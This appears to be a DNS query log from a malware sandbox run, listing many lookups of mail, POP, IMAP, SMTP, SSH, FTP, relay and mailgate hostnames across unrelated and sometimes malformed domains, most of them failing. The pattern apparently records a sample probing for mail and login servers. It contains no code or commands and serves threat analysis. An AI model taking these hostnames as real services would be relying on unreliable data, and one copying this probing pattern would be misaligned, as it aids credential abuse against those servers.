                                                                                                                                                                                                    Nov 26, 2023 06:59:37.826404095 CET1.1.1.1192.168.2.40xed9dName error (3)mailgate.utlinks.omnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.858700037 CET1.1.1.1192.168.2.40xe776Name error (3)ssh.gstudent.ctu.edu.vnnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.863133907 CET1.1.1.1192.168.2.40x30c0Server failure (2)bosworthacademy.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.873867989 CET1.1.1.1192.168.2.40xca07Name error (3)ssh.member3.co.zanonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.884752035 CET1.1.1.1192.168.2.40x597cName error (3)ssh.utlinks.omnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.885687113 CET1.1.1.1192.168.2.40x66edName error (3)member3.co.zanonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:38.009744883 CET1.1.1.1192.168.2.40xe448Name error (3)relay.maxiv.lu.senonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:38.178169966 CET1.1.1.1192.168.2.40x9340Name error (3)ssh.student.ub.ac.idnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:38.209348917 CET1.1.1.1192.168.2.40x4ae0Name error (3)mailgate.gstudent.ctu.edu.vnnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:38.209656954 CET1.1.1.1192.168.2.40xb741Name error (3)mail.dbschooldelhi.ac.innonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:38.214838982 CET1.1.1.1192.168.2.40x71abName error (3)mail.ardcrushing.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:38.216478109 CET1.1.1.1192.168.2.40x7168Name error (3)mail.highstreet-re.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:38.230792046 CET1.1.1.1192.168.2.40x4dfName error (3)mail.mnit.uc.innonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:38.238267899 CET1.1.1.1192.168.2.40x2618Server failure (2)ssh.schmith.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:38.241193056 CET1.1.1.1192.168.2.40x133bName error (3)2l7g4s.usnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:38.241522074 CET1.1.1.1192.168.2.40x1c31Name error (3)mail.carelesscommunity.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:38.241533041 CET1.1.1.1192.168.2.40xa822Name error (3)sofia-communications.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:38.241591930 CET1.1.1.1192.168.2.40x4c67Name error (3)mail.2l7g4s.usnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:38.247827053 CET1.1.1.1192.168.2.40x3961Name error (3)mail.lwindowelive.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:38.251667976 CET1.1.1.1192.168.2.40x16adName error (3)mail.y3.qj51acpnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:38.252150059 CET1.1.1.1192.168.2.40x3037Name error (3)ftp.5.e9mbw4ghnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:38.253460884 CET1.1.1.1192.168.2.40x29baName error (3)mail.foundtoo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:38.254520893 CET1.1.1.1192.168.2.40x4b6cName error (3)pop.sofia-communications.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:38.255740881 CET1.1.1.1192.168.2.40xc3edName error (3)mail.xtsagency.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:38.256026983 CET1.1.1.1192.168.2.40x61e5Name error (3)mail.kvsroraipur.innonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:38.270498037 CET1.1.1.1192.168.2.40xc409Name error (3)carelesscommunity.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:38.270513058 CET1.1.1.1192.168.2.40x403bName error (3)mail.sofia-communications.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:38.271029949 CET1.1.1.1192.168.2.40xb835Name error (3)ftp.utlinks.omnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:38.285485983 CET1.1.1.1192.168.2.40x5230Name error (3)ssh.lwindowelive.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:38.303872108 CET1.1.1.1192.168.2.40x8c55Server failure (2)schmith.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:38.306051970 CET1.1.1.1192.168.2.40xfdc5Name error (3)ftp.ippals.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:38.320233107 CET1.1.1.1192.168.2.40xba7fName error (3)ftp.matttux.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:38.325067997 CET1.1.1.1192.168.2.40x8dceServer failure (2)smtp.schmith.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:38.327662945 CET1.1.1.1192.168.2.40xf614Name error (3)ssh.bayambnag.gov.phnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:38.362942934 CET1.1.1.1192.168.2.40x54b6Name error (3)ftp.healteas.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:38.421494961 CET1.1.1.1192.168.2.40x6d22Name error (3)pop.xtsagency.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:38.426992893 CET1.1.1.1192.168.2.40xdfd4Name error (3)pop.2l7g4s.usnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:38.451656103 CET1.1.1.1192.168.2.40x56beName error (3)mail.paintd.plus.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:38.456525087 CET1.1.1.1192.168.2.40x54d8Name error (3)ftp.foundtoo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:38.503712893 CET1.1.1.1192.168.2.40xf9a3Name error (3)paintd.plus.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:38.537653923 CET1.1.1.1192.168.2.40xc978Name error (3)relay.bayambnag.gov.phnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:38.734196901 CET1.1.1.1192.168.2.40xbf2bName error (3)ftp.student.ub.ac.idnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:38.758666992 CET1.1.1.1192.168.2.40x4b72Name error (3)ftp.goldenfishcompany.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:38.820107937 CET1.1.1.1192.168.2.40xddf7Name error (3)ssh.adm.uksw.edunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:39.279088974 CET1.1.1.1192.168.2.40x5875Name error (3)pop.yahoo.comfreezednonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:39.289938927 CET1.1.1.1192.168.2.40x2e1eName error (3)pop.carelesscommunity.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:39.296304941 CET1.1.1.1192.168.2.40x3c16Name error (3)mail.heathcotebarr.eunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:39.305293083 CET1.1.1.1192.168.2.40x4502Server failure (2)mail.bosworthacademy.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:39.334722996 CET1.1.1.1192.168.2.40x80acName error (3)lwindowelive.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:39.341808081 CET1.1.1.1192.168.2.40xdcaName error (3)ssh.gmail.iononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:39.356451988 CET1.1.1.1192.168.2.40x1ce6Name error (3)pop.lgs-strategies.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:39.371611118 CET1.1.1.1192.168.2.40x20bName error (3)yahoo.comfreezednonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:39.371742010 CET1.1.1.1192.168.2.40xbc00Name error (3)mail.yahoo.comfreezednonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:39.371954918 CET1.1.1.1192.168.2.40xbc7Name error (3)lgs-strategies.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:39.372131109 CET1.1.1.1192.168.2.40x339dName error (3)ssh.schor.benonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:39.373383999 CET1.1.1.1192.168.2.40xe49fName error (3)mail.lgs-strategies.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:39.376044989 CET1.1.1.1192.168.2.40x627Name error (3)ssh.sofia-communications.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:39.383127928 CET1.1.1.1192.168.2.40xe52dName error (3)ssh.aoiit.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:39.403021097 CET1.1.1.1192.168.2.40x2ebeName error (3)pop.highstreet-re.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:39.403548002 CET1.1.1.1192.168.2.40xebf8Name error (3)pop.mnit.uc.innonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:39.403814077 CET1.1.1.1192.168.2.40xc08dName error (3)pop.dbschooldelhi.ac.innonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:39.405760050 CET1.1.1.1192.168.2.40x8f36Name error (3)pop.ardcrushing.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:39.433479071 CET1.1.1.1192.168.2.40x5d67Name error (3)pop.y3.qj51acpnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:39.434214115 CET1.1.1.1192.168.2.40x1233Name error (3)ssh.lgs-strategies.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:39.434972048 CET1.1.1.1192.168.2.40xecName error (3)pop.foundtoo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:39.435110092 CET1.1.1.1192.168.2.40xffefName error (3)pop.kvsroraipur.innonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:39.436467886 CET1.1.1.1192.168.2.40x749Name error (3)pop.lwindowelive.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:39.458813906 CET1.1.1.1192.168.2.40x6e2eName error (3)ssh.paintd.plus.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:39.463896036 CET1.1.1.1192.168.2.40x4d46Name error (3)pop.paintd.plus.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:39.483937979 CET1.1.1.1192.168.2.40x8014No error (0)avient-com.mail.protection.outlook.com52.101.9.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:39.483937979 CET1.1.1.1192.168.2.40x8014No error (0)avient-com.mail.protection.outlook.com52.101.9.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:39.483937979 CET1.1.1.1192.168.2.40x8014No error (0)avient-com.mail.protection.outlook.com52.101.42.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:39.483937979 CET1.1.1.1192.168.2.40x8014No error (0)avient-com.mail.protection.outlook.com52.101.42.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:39.483937979 CET1.1.1.1192.168.2.40x8014No error (0)avient-com.mail.protection.outlook.com52.101.8.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:39.483937979 CET1.1.1.1192.168.2.40x8014No error (0)avient-com.mail.protection.outlook.com52.101.11.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:39.483937979 CET1.1.1.1192.168.2.40x8014No error (0)avient-com.mail.protection.outlook.com52.101.8.42A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:39.489181042 CET1.1.1.1192.168.2.40xb23aNo error (0)aoiit-store.mail.protection.outlook.com52.101.8.42A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:39.489181042 CET1.1.1.1192.168.2.40xb23aNo error (0)aoiit-store.mail.protection.outlook.com52.101.8.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:39.489181042 CET1.1.1.1192.168.2.40xb23aNo error (0)aoiit-store.mail.protection.outlook.com52.101.8.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:39.489181042 CET1.1.1.1192.168.2.40xb23aNo error (0)aoiit-store.mail.protection.outlook.com52.101.42.6A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:39.489181042 CET1.1.1.1192.168.2.40xb23aNo error (0)aoiit-store.mail.protection.outlook.com52.101.9.0A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:39.489181042 CET1.1.1.1192.168.2.40xb23aNo error (0)aoiit-store.mail.protection.outlook.com52.101.11.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:39.489181042 CET1.1.1.1192.168.2.40xb23aNo error (0)aoiit-store.mail.protection.outlook.com52.101.8.36A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:39.496799946 CET1.1.1.1192.168.2.40x700aName error (3)xtsagency.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:39.555522919 CET1.1.1.1192.168.2.40xd62eName error (3)mailgate.member3.co.zanonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:39.584589005 CET1.1.1.1192.168.2.40xe558Name error (3)mail.gmail.iononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:39.611479044 CET1.1.1.1192.168.2.40xa6c9Name error (3)mail.privatemoe.aenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:39.615896940 CET1.1.1.1192.168.2.40x39bdName error (3)ftp.bayambnag.gov.phnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:39.617153883 CET1.1.1.1192.168.2.40x374cName error (3)relay.adm.uksw.edunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:39.750442028 CET1.1.1.1192.168.2.40xf0c8Name error (3)pop.gmail.iononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:39.895715952 CET1.1.1.1192.168.2.40xb7dfName error (3)mailgate.heathcotebarr.eunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:39.945768118 CET1.1.1.1192.168.2.40x3549Server failure (2)ftp.schmith.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:39.950144053 CET1.1.1.1192.168.2.40x7cServer failure (2)imap.bosworthacademy.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:39.986629963 CET1.1.1.1192.168.2.40xe0a1Name error (3)pop.heathcotebarr.eunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:40.173969984 CET1.1.1.1192.168.2.40x9c8dName error (3)relay.elitebusinesshn.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:40.642102003 CET1.1.1.1192.168.2.40xb082No error (0)route2.mx.cloudflare.net162.159.205.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:40.642102003 CET1.1.1.1192.168.2.40xb082No error (0)route2.mx.cloudflare.net162.159.205.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:40.642102003 CET1.1.1.1192.168.2.40xb082No error (0)route2.mx.cloudflare.net162.159.205.19A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:40.691488981 CET1.1.1.1192.168.2.40x786fName error (3)imap.mnit.uc.innonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:40.692451000 CET1.1.1.1192.168.2.40x8ca2Name error (3)imap.2l7g4s.usnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:40.698290110 CET1.1.1.1192.168.2.40x5344Name error (3)imap.carelesscommunity.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:40.703402042 CET1.1.1.1192.168.2.40xd263Name error (3)imap.sofia-communications.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:40.706532955 CET1.1.1.1192.168.2.40x42a0Name error (3)imap.yahoo.comfreezednonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:40.707496881 CET1.1.1.1192.168.2.40x28dfName error (3)imap.xtsagency.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:40.709111929 CET1.1.1.1192.168.2.40x4424Name error (3)pop3.sofia-communications.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:40.719728947 CET1.1.1.1192.168.2.40x492eName error (3)imap.lwindowelive.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:40.725308895 CET1.1.1.1192.168.2.40x97bName error (3)imap.dbschooldelhi.ac.innonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:40.725414991 CET1.1.1.1192.168.2.40x5385Name error (3)pop3.2l7g4s.usnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:40.734405041 CET1.1.1.1192.168.2.40x2434Name error (3)imap.kvsroraipur.innonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:40.736382961 CET1.1.1.1192.168.2.40x1473Name error (3)imap.ardcrushing.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:40.736490011 CET1.1.1.1192.168.2.40x7898Name error (3)imap.foundtoo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:40.737530947 CET1.1.1.1192.168.2.40x74f7Name error (3)imap.highstreet-re.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:40.737579107 CET1.1.1.1192.168.2.40xbe52Name error (3)imap.y3.qj51acpnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:40.740293026 CET1.1.1.1192.168.2.40x7cd0Name error (3)imap.heathcotebarr.eunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:40.740617037 CET1.1.1.1192.168.2.40xb203Name error (3)pop3.yahoo.comfreezednonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:40.751107931 CET1.1.1.1192.168.2.40x9407Name error (3)pop3.lgs-strategies.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:40.753272057 CET1.1.1.1192.168.2.40xd9a8Name error (3)pop3.highstreet-re.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:40.754328012 CET1.1.1.1192.168.2.40x7a3Name error (3)pop3.lwindowelive.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:40.755044937 CET1.1.1.1192.168.2.40x12a4Name error (3)pop3.mnit.uc.innonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:40.756386995 CET1.1.1.1192.168.2.40xf98fName error (3)pop3.dbschooldelhi.ac.innonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:40.757746935 CET1.1.1.1192.168.2.40x854cName error (3)pop3.ardcrushing.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:40.757762909 CET1.1.1.1192.168.2.40xf99aName error (3)pop3.kvsroraipur.innonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:40.762074947 CET1.1.1.1192.168.2.40x5c65Name error (3)pop3.y3.qj51acpnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:40.766838074 CET1.1.1.1192.168.2.40x83fNo error (0)ww16.ondania.com91.195.240.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:40.804294109 CET1.1.1.1192.168.2.40x7101Name error (3)pop3.carelesscommunity.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:40.812331915 CET1.1.1.1192.168.2.40x5b74Name error (3)pop3.heathcotebarr.eunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:40.826006889 CET1.1.1.1192.168.2.40xf532Name error (3)pop3.foundtoo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:40.872504950 CET1.1.1.1192.168.2.40x767cName error (3)imap.gmail.iononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:40.884355068 CET1.1.1.1192.168.2.40x44f3Name error (3)relay.member3.co.zanonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:40.884485006 CET1.1.1.1192.168.2.40x1ea1Name error (3)mail.member3.co.zanonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:40.889879942 CET1.1.1.1192.168.2.40x4a00Name error (3)relay.utlinks.omnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:40.899827957 CET1.1.1.1192.168.2.40x314eName error (3)imap.paintd.plus.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:40.900878906 CET1.1.1.1192.168.2.40x400dName error (3)mailgate.bunasta.eunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:40.909113884 CET1.1.1.1192.168.2.40x2cedName error (3)imap.lgs-strategies.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:40.920377970 CET1.1.1.1192.168.2.40x2331Name error (3)pop3.paintd.plus.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:40.931417942 CET1.1.1.1192.168.2.40xf6f0Name error (3)pop3.xtsagency.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:41.009840965 CET1.1.1.1192.168.2.40x5d84Name error (3)pop3.gmail.iononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:41.030790091 CET1.1.1.1192.168.2.40xd39Name error (3)pop.privatemoe.aenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:41.186019897 CET1.1.1.1192.168.2.40x6caeNo error (0)ftp.prettypollycleaning.ae192.96.211.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:41.375684977 CET1.1.1.1192.168.2.40x34a8Name error (3)relay.gstudent.ctu.edu.vnnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:41.436331034 CET1.1.1.1192.168.2.40xab5Server failure (2)mailgate.bosworthacademy.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:41.500762939 CET1.1.1.1192.168.2.40x3d06Server failure (2)mailgate.schmith.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:41.518887043 CET1.1.1.1192.168.2.40xeb99Name error (3)mailgate.yahoo.comfreezednonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:41.519620895 CET1.1.1.1192.168.2.40x98f7Name error (3)mailgate.sofia-communications.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:41.588329077 CET1.1.1.1192.168.2.40x6deaName error (3)mailgate.lgs-strategies.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:41.712896109 CET1.1.1.1192.168.2.40x45aeName error (3)mailgate.2l7g4s.usnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:41.712908030 CET1.1.1.1192.168.2.40xa0deName error (3)mailgate.highstreet-re.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:41.713797092 CET1.1.1.1192.168.2.40x932Name error (3)mailgate.lwindowelive.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:41.718667030 CET1.1.1.1192.168.2.40xc162Name error (3)mailgate.kvsroraipur.innonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:41.718715906 CET1.1.1.1192.168.2.40x69adName error (3)mailgate.mnit.uc.innonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:41.785214901 CET1.1.1.1192.168.2.40x8693Name error (3)mailgate.ardcrushing.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:41.786955118 CET1.1.1.1192.168.2.40x1b34Name error (3)imap.privatemoe.aenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:41.935277939 CET1.1.1.1192.168.2.40x634aName error (3)mailgate.xtsagency.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:41.935961962 CET1.1.1.1192.168.2.40xad4bName error (3)mailgate.y3.qj51acpnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:41.937201023 CET1.1.1.1192.168.2.40x5ac1Name error (3)mailgate.foundtoo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:41.941226006 CET1.1.1.1192.168.2.40x7f5Name error (3)mailgate.dbschooldelhi.ac.innonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:41.977912903 CET1.1.1.1192.168.2.40x27adName error (3)mailgate.gmail.iononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:41.997703075 CET1.1.1.1192.168.2.40x99dcName error (3)mailgate.carelesscommunity.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:42.110692024 CET1.1.1.1192.168.2.40xc18eName error (3)mailgate.paintd.plus.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:42.115817070 CET1.1.1.1192.168.2.40xbb15Name error (3)relay.heathcotebarr.eunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:42.131567001 CET1.1.1.1192.168.2.40x2c2bName error (3)smtp.sofia-communications.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:42.158688068 CET1.1.1.1192.168.2.40xedc4Name error (3)relay.highstreet-re.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:42.158776999 CET1.1.1.1192.168.2.40x269fName error (3)relay.lgs-strategies.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:42.159044027 CET1.1.1.1192.168.2.40xb63eName error (3)relay.yahoo.comfreezednonenoneA (IP address)IN (0x0001)false
